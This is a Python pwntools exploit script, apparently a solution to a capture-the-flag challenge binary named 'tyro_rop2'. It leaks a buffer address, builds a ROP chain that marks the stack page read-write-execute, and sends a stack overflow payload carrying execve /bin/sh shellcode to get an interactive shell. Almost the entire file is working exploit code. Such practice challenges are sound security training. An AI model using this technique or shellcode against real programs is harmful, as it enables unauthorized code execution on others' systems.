#!/usr/bin/env python

from pwn import *
import math

# Change this value if your page size is different
PAGE_SIZE = 4096
PAGE_SHIFT = int(math.log(PAGE_SIZE,2))

# Interact with the process
p = process("./tyro_rop2_8be61a1002b74b6dd6b0838c7384db84")

# Figure out the buffer address
p.recvuntil("buff[128] is at ")
buf = int(p.recvline(),16)

# Use the chain that angrop gave us, with a few modifications
chain = ""
chain += p32(0x8048410)
chain += p32(0x80483e2) # add esp, 8; pop ebx; ret 
chain += p32((buf >> PAGE_SHIFT) << PAGE_SHIFT) # location to change perms on (needing to page align)
chain += p32(PAGE_SIZE) # Size to change perms on
chain += p32(0x7) # What to change them to, 7 == RWX
chain += p32(buf) # Go ahead and call our area now that it should be executable

# Standard execve /bin/sh
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"

# Chain should start 140 in
exp = shellcode + "A"*(140 - len(shellcode)) + chain

# Send the exploit
p.send_raw(exp + "\n")

# Interact with our shiny new shell
p.interactive()